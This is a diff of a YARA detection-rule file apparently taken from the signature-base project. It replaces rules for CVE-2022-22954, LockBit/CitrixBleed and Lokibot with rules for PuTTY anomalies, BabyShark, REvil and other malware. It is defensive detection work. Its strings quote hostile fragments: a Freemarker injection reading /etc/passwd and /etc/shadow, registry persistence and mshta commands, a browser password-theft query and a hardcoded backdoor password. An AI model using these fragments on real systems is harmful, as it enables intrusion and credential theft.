-		logic_hash = "20c1d55e29b777cca3cb8e92fbe45e23e6bbf972167dee8b0a012d9ff12f3841"
-		score = 60
+		logic_hash = "dcc06261b1ea39c587d8bcefbb8e85e6b9016da01bf66c2eefe5bd7bbdfc6968"
+		score = 65
 		quality = 85
-		tags = "CVE-2022-22954"
+		tags = "FILE"
 
 	strings:
-		$x2 = "${\"freemarker.template.utility.Execute\"?new()("
-		$x3 = "cat /etc/passwd\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute"
-		$x4 = "cat /etc/passwd\\\")).(#execute=#instancemanager.newInstance(\\\"freemarker.template.utility.Execute"
-		$x5 = "cat /etc/shadow\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute"
-		$x6 = "cat /etc/shadow\\\")).(#execute=#instancemanager.newInstance(\\\"freemarker.template.utility.Execute"
-		$fpg1 = "All Rights"
-		$fpg2 = "<html"
-		$fpg3 = "<HTML"
-		$fpg4 = "Copyright" ascii wide
-		$fpg5 = "License"
-		$fpg6 = "<?xml"
-		$fpg7 = "Help" fullword
-		$fpg8 = "COPYRIGHT" ascii wide fullword
-		$fpg9 = "Backup"
-		$fp1 = "severity: critical"
+		$a0 = "<Task version=" ascii wide
+		$a1 = "xmlns=\"http://schemas.microsoft.com/windows/" ascii wide
+		$fp1 = "</Counter><Counter>" wide
+		$fp2 = "Office Feature Updates Logon" wide
+		$fp3 = "Microsoft Shared" fullword wide
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0xfeff and filesize > 20KB and all of ( $a* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_LOG_SUSP_EXPL_POC_Vmware_Workspace_ONE_CVE_2022_22954_Apr22_ : CVE_2022_22954
+rule SIGNATURE_BASE_SUSP_Putty_Unnormal_Size : FILE
 {
 	meta:
-		description = "Detects payload as seen in PoC code to exploit Workspace ONE Access freemarker server-side template injection CVE-2022-22954"
-		author = "Florian Roth"
-		id = "c54a3a7a-aafc-52d4-863c-ed254b0da527"
-		date = "2022-04-08"
-		modified = "2025-03-29"
-		old_rule_name = "EXPL_POC_VMWare_Workspace_ONE_CVE_2022_22954_Apr22"
-		reference = "https://twitter.com/rwincey/status/1512241638994853891/photo/1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2022_22954_vmware_workspace_one.yar#L36-L54"
+		description = "Detects a putty version with a size different than the one provided by Simon Tatham (could be caused by an additional signature or malware)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "576b118c-d4be-5ce2-994a-ce3f943dda88"
+		date = "2019-01-07"
+		modified = "2022-06-30"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L447-L497"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c383f197da1e043e632c4d4de03fa7ff42e3fb6fa7824f326874446bcd13588"
-		score = 60
+		logic_hash = "2f2c21cc25eaba8c1812db617203427a59e9a55f8620676e4bbe4cb3cd4071fd"
+		score = 50
 		quality = 85
-		tags = "CVE-2022-22954"
+		tags = "FILE"
+		hash1 = "e5e89bdff733d6db1cffe8b3527e823c32a78076f8eadc2f9fd486b74a0e9d88"
+		hash2 = "ce4c1b718b54973291aefdd63d1cca4e4d8d4f5353a2be7f139a290206d0c170"
+		hash3 = "adb72ea4eab7b2efc2da6e72256b5a3bb388e9cdd4da4d3ff42a9fec080aa96f"
+		hash4 = "1c0bd6660fa43fa90bd88b56cdd4a4c2ffb4ef9d04e8893109407aa7039277db"
 
 	strings:
-		$x1 = "66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28" ascii
-		$fp2 = "ModSecurity"
-		$fp3 = " 302 -"
+		$s1 = "SSH, Telnet and Rlogin client" fullword wide
+		$v1 = "Release 0.6" wide
+		$v2 = "Release 0.70" wide
+		$fp1 = "KiTTY fork" fullword wide
 
 	condition:
-		1 of ( $x* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and $s1 and 1 of ( $v* ) and not 1 of ( $fp* ) and filesize != 524288 and filesize != 495616 and filesize != 483328 and filesize != 524288 and filesize != 712176 and filesize != 828400 and filesize != 569328 and filesize != 454656 and filesize != 531368 and filesize != 524288 and filesize != 483328 and filesize != 713592 and filesize != 829304 and filesize != 571256 and filesize != 774200 and filesize != 854072 and filesize != 665144 and filesize != 774200 and filesize != 854072 and filesize != 665144 and filesize != 640000 and filesize != 650720 and filesize != 662808 and filesize != 651256 and filesize != 664432
 }
-rule SIGNATURE_BASE_MAL_Backdoor_DLL_Nov23_1 : CVE_2023_4966 FILE
+rule SIGNATURE_BASE_SUSP_RTF_Header_Anomaly : FILE
 {
 	meta:
-		description = "Detects a backdoor DLL, that was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
-		author = "X__Junior"
-		id = "3588d437-b561-5380-8dac-73a31f4cdb5a"
-		date = "2023-11-23"
-		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L1-L22"
+		description = "Detects malformed RTF header often used to trick mechanisms that check for a full RTF header"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fb362640-9a45-5ee5-8749-3980e0549932"
+		date = "2019-01-20"
+		modified = "2022-09-15"
+		reference = "https://twitter.com/ItsReallyNick/status/975705759618158593"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_anomalies.yar#L499-L511"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6788d37301bb82bd4d9584e192e2fb14d4f6c77801b70299097d8ba139219394"
-		score = 80
+		logic_hash = "c0be95894edc861cf322309f2c86a8ab986bb111dfdeea1990b4a074d5ab9ea3"
+		score = 50
 		quality = 85
-		tags = "CVE-2023-4966, FILE"
-		hash1 = "cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63"
-		hash2 = "0eb66eebb9b4d671f759fb2e8b239e8a6ab193a732da8583e6e8721a2670a96d"
-
-	strings:
-		$s1 = "ERROR GET INTERVAL" ascii
-		$s2 = "OFF HIDDEN MODE" ascii
-		$s3 = "commandMod:" ascii
-		$s4 = "RESULT:" ascii
-		$op1 = { C7 44 24 ?? 01 00 00 00 C7 84 24 ?? ?? ?? ?? FF FF FF FF 83 7C 24 ?? 00 74 ?? 83 BC 24 ?? ?? ?? ?? 00 74 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 00 04 00 00 48 8D 94 24 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 }
-		$op2 = { 48 C7 44 24 ?? 00 00 00 00 C7 44 24 ?? 00 00 00 00 C7 44 24 ?? 03 00 00 00 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 4C 8D 0D ?? ?? ?? ?? 44 0F B7 05 ?? ?? ?? ?? 48 8B D0 48 8B 4C 24 ?? FF 15 }
+		tags = "FILE"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $op* ) )
+		uint32( 0 ) == 0x74725c7b and not uint8( 4 ) == 0x66
 }
-rule SIGNATURE_BASE_MAL_Trojan_DLL_Nov23 : CVE_2023_4966 FILE
+rule SIGNATURE_BASE_Rtf_CVE_2018_0802 : CVE_2018_0802 FILE
 {
 	meta:
-		description = "Detects a trojan DLL that installs other components - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
-		author = "X__Junior"
-		id = "1dd87d0a-2b8b-5386-8fdd-40d184c731a4"
-		date = "2023-11-23"
+		description = "Attempts to exploit CVE-2018-0802"
+		author = "Rich Warren"
+		id = "162492a3-d792-5f1c-a143-191c62b54728"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L24-L39"
+		reference = "http://www.freebuf.com/vuls/159789.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2018_0802.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9be42742711b4d0440244b507945e074b61c456588580b3263f899a7eb84d8aa"
-		score = 80
-		quality = 85
-		tags = "CVE-2023-4966, FILE"
-		hash1 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068"
+		logic_hash = "ac1cd4f2162d2c8415e2ee5167cabb8e8aff08a06afe244f5bfe099f2d3fbeb4"
+		score = 75
+		quality = 58
+		tags = "CVE-2018-0802, FILE"
 
 	strings:
-		$op1 = { C7 84 24 ?? ?? ?? ?? 52 70 63 53 C7 84 24 ?? ?? ?? ?? 74 72 69 6E C7 84 24 ?? ?? ?? ?? 67 42 69 6E C7 84 24 ?? ?? ?? ?? 64 69 6E 67 C7 84 24 ?? ?? ?? ?? 43 6F 6D 70 C7 84 24 ?? ?? ?? ?? 6F 73 65 41 C7 84 24 ?? ?? ?? ?? 00 40 01 01 }
-		$op2 = { C7 84 24 ?? ?? ?? ?? 6C 73 61 73 C7 84 24 ?? ?? ?? ?? 73 70 69 72 66 C7 84 24 ?? ?? 00 00 70 63 }
-		$op3 = { C7 84 24 ?? ?? ?? ?? 4E 64 72 43 C7 84 24 ?? ?? ?? ?? 6C 69 65 6E C7 84 24 ?? ?? ?? ?? 74 43 61 6C C7 84 24 ?? ?? ?? ?? 6C 33 00 8D }
+		$equation = { 45 71 75 61 74 69 6F 6E 2E 33 }
+		$header_and_shellcode = /03010[0,1][0-9a-fA-F]{308,310}2500/ ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint32be( 0 ) == 0x7B5C7274 and all of them
 }
-rule SIGNATURE_BASE_MAL_DLL_Stealer_Nov23 : CVE_2023_4966 FILE
+
+rule SIGNATURE_BASE_MAL_PE_Type_Babyshark_Loader : FILE
 {
 	meta:
-		description = "Detects a DLL that steals authentication credentials - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
-		author = "X__Junior"
-		id = "9cfed8ec-1d04-53d7-88ef-2576075cfc33"
-		date = "2023-11-23"
+		description = "Detects PE Type babyShark loader mentioned in February 2019 blog post by PaloAltNetworks"
+		author = "Florian Roth (Nextron Systems)"
+		id = "141e7a67-7930-5fd8-ac91-5d31b99e4ff3"
+		date = "2019-02-24"
 		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L41-L54"
+		reference = "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_babyshark.yar#L4-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7d0c46d855973cb2c0636aed9c67cfbe47ca260ab1bc842fef1d532725c26910"
-		score = 80
-		quality = 85
-		tags = "CVE-2023-4966, FILE"
-		hash1 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994"
+		logic_hash = "0ab9a30cb731922d965a9cf58094fea36d5c74b9989324efee603808591ea6a5"
+		score = 75
+		quality = 60
+		tags = "FILE"
+		hash1 = "6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c"
 
 	strings:
-		$op1 = { C7 45 ?? 4D 69 6E 69 C7 45 ?? 44 75 6D 70 C7 45 ?? 57 72 69 74 C7 45 ?? 65 44 75 6D C7 45 ?? 70 00 27 00 C7 45 ?? 44 00 62 00 C7 45 ?? 67 00 68 00 C7 45 ?? 65 00 6C 00 C7 45 ?? 70 00 2E 00 C7 45 ?? 64 00 6C 00 C7 45 ?? 6C 00 00 00}
+		$x1 = "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\" /v AutoRun /t REG_SZ /d \"%s\" /f" fullword ascii
+		$x2 = /mshta\.exe http:\/\/[a-z0-9\.\/]{5,30}\.hta/
+		$xc1 = { 57 69 6E 45 78 65 63 00 6B 65 72 6E 65 6C 33 32
+               2E 44 4C 4C 00 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and ( pe.imphash ( ) == "57b6d88707d9cd1c87169076c24f962e" or 1 of them or for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "thawte SHA256 Code Signing CA" and pe.signatures [ i ] . serial == "0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d" ) )
 }
-rule SIGNATURE_BASE_MAL_Python_Backdoor_Script_Nov23 : CVE_2023_4966 FILE
+rule SIGNATURE_BASE_APT_NK_Babyshark_Kimjoingrat_Apr19_1 : FILE
 {
 	meta:
-		description = "Detects a trojan (written in Python) that communicates with c2 - was seen being used by LockBit 3.0 affiliates exploiting CVE-2023-4966"
-		author = "X__Junior"
-		id = "861f9ce3-3c54-5c56-b50b-2b7536783f6e"
-		date = "2023-11-23"
+		description = "Detects BabyShark KimJongRAT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c6bd1e1a-68f2-5a2d-a159-b16ea0d33987"
+		date = "2019-04-27"
 		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L56-L71"
+		reference = "https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_babyshark.yar#L29-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b336f6438a420af49b1b0144039f1051f12c0c54f77a94e2f947f71d1f6230b3"
-		score = 80
+		logic_hash = "3fec0f21e299e09ae9734f256edbbca81a53f860b42e99a78b07d344552f1062"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-4966, FILE"
-		hash1 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6"
+		tags = "FILE"
+		hash1 = "d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712"
 
 	strings:
-		$s1 = "port = 443 if \"https\"" ascii
-		$s2 = "winrm.Session basic error" ascii
-		$s3 = "Windwoscmd.run_cmd(str(cmd))" ascii
+		$x1 = "%s\\Microsoft\\ttmp.log" fullword wide
+		$a1 = "logins.json" fullword ascii
+		$s1 = "https://www.google.com/accounts/servicelogin" fullword ascii
+		$s2 = "https://login.yahoo.com/config/login" fullword ascii
+		$s3 = "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login" ascii
+		$s4 = "\\mozsqlite3.dll" ascii
+		$s5 = "SMTP Password" fullword ascii
+		$s6 = "Yandex\\YandexBrowser\\User Data\\Default\\Login Data" fullword ascii
 
 	condition:
-		filesize < 50KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or ( $a1 and 3 of ( $s* ) ) )
 }
-rule SIGNATURE_BASE_APT_RANSOM_Lockbit_Forensicartifacts_Nov23
+
+rule SIGNATURE_BASE_APT_MAL_Revil_Kaseya_Jul21_1 : FILE
 {
 	meta:
-		description = "Detects patterns found in Lockbit TA attacks exploiting Citrixbleed vulnerability CVE 2023-4966"
-		author = "Florian Roth"
-		id = "04bde599-2a5b-5a33-a6f1-67d57a564946"
-		date = "2023-11-22"
+		description = "Detects malware used in the Kaseya supply chain attack"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7356f4ea-183f-52ec-a167-fc16b8bfb55a"
+		date = "2021-07-02"
 		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ransom_lockbit_citrixbleed_nov23.yar#L73-L86"
+		reference = "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_revil_general.yar#L3-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6ba1d47e2cac72143c4612c420777024f114afc007c7b15251a58819654aeff1"
+		logic_hash = "a7f9fa8f8e8a3a25728aa6a334924e0b4075f3422df6b92a2f544bb0ebb6bfad"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e"
+		hash2 = "aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7"
+		hash3 = "dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f"
+		hash4 = "df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e"
 
 	strings:
-		$x1 = "taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe"
-		$x2 = " 1> \\\\127.0.0.1\\admin$\\__"
+		$s1 = "Mpsvc.dll" wide fullword
+		$s2 = ":0:4:8:<:@:D:H:L:P:T:X:\\:`:d:h:l:p:t:x:H<L<P<\\<`<" ascii fullword
+		$op1 = { 40 87 01 c3 6a 08 68 f8 0e 41 00 e8 ae db ff ff be 80 25 41 00 39 35 ?? 32 41 00 }
+		$op2 = { 8b 40 04 2b c2 c1 f8 02 3b c8 0f 84 56 ff ff ff 68 15 50 40 00 2b c1 6a 04 }
+		$op3 = { 74 73 db e2 e8 ad 07 00 00 68 60 1a 40 00 e8 8f 04 00 00 e8 3a 05 00 00 50 e8 25 26 00 00 }
+		$op4 = { 75 05 8b 45 fc eb 4c c7 45 f8 00 00 00 00 6a 00 8d 45 f0 50 8b 4d 0c }
+		$op5 = { 83 7d 0c 00 75 05 8b 45 fc eb 76 6a 00 68 80 00 00 00 6a 01 6a 00 }
 
 	condition:
-		1 of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "c36dcd2277c4a707a1a645d0f727542a" or 2 of them )
 }
-rule SIGNATURE_BASE_VULN_Confluence_Questions_Plugin_CVE_2022_26138_Jul22_1 : CVE_2022_26138
+rule SIGNATURE_BASE_APT_MAL_Revil_Kaseya_Jul21_2 : FILE
 {
 	meta:
-		description = "Detects properties file of Confluence Questions plugin with static user name and password (backdoor) CVE-2022-26138"
+		description = "Detects malware used in the Kaseya supply chain attack"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1443c673-2a86-5431-876a-c8fccba52190"
-		date = "2022-07-21"
+		id = "38b168d4-e761-544e-9859-eb155bbfe54a"
+		date = "2021-07-02"
 		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/news/security/atlassian-fixes-critical-confluence-hardcoded-credentials-flaw/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_confluence_questions_plugin_cve_2022_26138.yar#L2-L23"
+		reference = "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_revil_general.yar#L32-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c164bd3d9ed1e155d51112e14340b814f6ea782604540c84a6e9efb5c6041156"
-		score = 50
+		logic_hash = "44948d93c71370a9976f22bf78cd1af80359f2c9804ea7995791109785cfaf84"
+		score = 75
 		quality = 85
-		tags = "CVE-2022-26138"
+		tags = "FILE"
+		hash1 = "0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402"
+		hash2 = "8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd"
+		hash3 = "cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6"
+		hash4 = "d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f"
+		hash5 = "d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20"
+		hash6 = "e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2"
 
 	strings:
-		$x_plain_1 = "predefined.user.password=disabled1system1user6708"
-		$jar_marker = "/confluence/plugins/questions/"
-		$jar_size_1 = { 00 CC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-      /*    here starts default.properties v                          */
-                      ?? ?? ?? ?? ?? ?? 00 64 65 66 61 75 6C 74 2E 70
-                      72 6F 70 65 72 74 69 65 73 50 4B }
-		$jar_size_2 = { 00 CC 00 ?? ?? ?? ?? ?? 00 64 65 66 61 75 6C 74
-                      2E 70 72 6F 70 65 72 74 69 65 73 }
+		$opa1 = { 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 }
+		$opa2 = { 89 45 f0 8b 4d fc 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 }
+		$opa3 = { 83 c1 01 89 4d fc 81 7d f0 ff 00 00 00 77 1? ba 01 00 00 00 6b c2 00 8b 4d 08 0f b6 14 01 }
+		$opa4 = { 89 45 f4 8b 0d ?? ?0 07 10 89 4d f8 8b 15 ?? ?1 07 10 89 55 fc ff 75 fc ff 75 f8 ff 55 f4 }
+		$opb1 = { 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc cc }
+		$opb2 = { 18 00 10 0e 19 00 10 cc cc cc cc 8b 44 24 04 }
+		$opb3 = { 10 c4 18 00 10 bd 18 00 10 bd 18 00 10 0e 19 00 10 cc cc }
 
 	condition:
-		1 of ( $x* ) or ( $jar_marker and 1 of ( $jar_size* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 2 of ( $opa* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Lokibot_Dropper_Scancopypdf_Feb18 : FILE
+rule SIGNATURE_BASE_Mal_Babbleloader_Win_Jan24 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file Scan Copy.pdf.com"
-		author = "Florian Roth (Nextron Systems)"
-		id = "64c45d91-4e18-5fd1-8d93-b5db4df7da29"
-		date = "2018-02-14"
-		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_loki_bot.yar#L11-L31"
+		description = "This rule detects intrinsic patterns of BabbleLoader."
+		author = "0x0d4y"
+		id = "b2f18ab3-b4df-4e2f-aa23-de8694beb221"
+		date = "2025-01-27"
+		modified = "2025-03-20"
+		reference = "https://0x0d4y.blog/babbleloader-technical-malware-analysis/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_babbleloader_win_jan24.yar#L1-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b9f10a09d91c10731e34dc88f87104693cdc794ddc3c63ee382f976d0a75f30f"
-		score = 75
+		hash = "fa3d03c319a7597712eeff1338dabf92"
+		logic_hash = "d4f7915146b1f3fe50febc231247e14323e9d68a94b2b9c8149a5727c06162ca"
+		score = 100
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6f8ff26a5daf47effdea5795cdadfff9265c93a0ebca0ce5a4144712f8cab5be"
+		license = "CC BY 4.0"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
 
 	strings:
-		$x1 = "Win32           Scan Copy.pdf   " fullword wide
-		$a1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
-		$s1 = "Compiling2.exe" fullword wide
-		$s2 = "Unstalled2" fullword ascii
-		$s3 = "Compiling.exe" fullword wide
+		$str_decryption_algorithm = { 48 63 44 24 ?? 48 8b 4c 24 ?? 0f b6 04 ?? 33 44 ?? ?? 0f b6 4c ?? ?? d2 c8 48 63 4c ?? ?? 48 8b 54 ?? ?? 88 04 0a 6b 44 24 ?? ?? 89 44 ?? ?? 8b 44 24 ?? ff c0 89 44 24 }
+		$hashing_algorithm = { 48 8b 44 24 ?? 0f be ?? 89 44 24 ?? 8b 44 24 ?? 89 44 24 ?? 48 8b 44 24 ?? 48 ff c0 48 89 44 24 ?? 83 7c 24 08 ?? ?? ?? 8b 44 24 ?? 8b 0c ?? 03 c8 8b c1 89 04 24 8b 44 24 ?? 05 ?? ?? ?? ?? 8b 0c 24 0f af c8 8b c1 89 04 }
+		$halos_gate = { 48 8b 44 24 ?? 0f b6 ?? 83 f8 4c 0f ?? ?? ?? ?? ?? 48 8b 44 ?? ?? 0f b6 ?? ?? 3d 8b ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 3d d1 ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 3d b8 ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 85 c0 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 85c0 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 88 44 ?? ?? 48 8b 44 24 ?? 0f b6 40 ?? 88 44 ?? ?? 0f b6 44 ?? ?? c1 e0 08 0f b6 4c ?? ?? 0b c1 48 8b 8c ?? ?? ?? ?? ?? 89 01 ?? ?? ?? ?? ?? 48 8b 44 ?? ?? 0f b6 00 3d e9 }
+		$get_syscall_offset = { 4d 33 db 4c 8b d9 c3 }
+		$jump_syscall_offset = { 4c 8b d1 41 8b 03 41 ff 63 ?? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and $x1 or ( $a1 and 1 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and $str_decryption_algorithm and $hashing_algorithm and ( 1 of ( $halos_gate , $get_syscall_offset , $jump_syscall_offset ) )
 }
-rule SIGNATURE_BASE_Lokibot_Dropper_Packed_R11_Feb18 : FILE
+rule SIGNATURE_BASE_Dexter_Malware
 {
 	meta:
-		description = "Auto-generated rule - file scan copy.pdf.r11"
+		description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b"
 		author = "Florian Roth (Nextron Systems)"
-		id = "83cd6225-eb6d-5d17-a751-51f20db9c7eb"
-		date = "2018-02-14"
+		id = "8be328ec-ba29-50ba-8d35-e2c4dfcae45e"
+		date = "2015-02-10"
 		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_loki_bot.yar#L33-L46"
+		reference = "http://goo.gl/oBvy8b"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_dexter_trojan.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ca39cac8dcbbbe1697ef96bde60c522bb9cc190c208483220aa96bc672f325a"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		logic_hash = "3b05bccce63c1f7e8d6d3f654b611f33da5fc1dbcbd28ff28f817d00bf961e64"
+		score = 70
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029"
 
 	strings:
-		$s1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii
+		$s0 = "Java Security Plugin" fullword wide
+		$s1 = "%s\\%s\\%s.exe" fullword wide
+		$s2 = "Sun Java Security Plugin" fullword wide
+		$s3 = "\\Internet Explorer\\iexplore.exe" wide
 
 	condition:
-		uint16( 0 ) == 0x0000 and filesize < 2000KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_JS_Envyscout_May21_1 : FILE
+rule SIGNATURE_BASE_Tidepool_Malware : FILE
 {
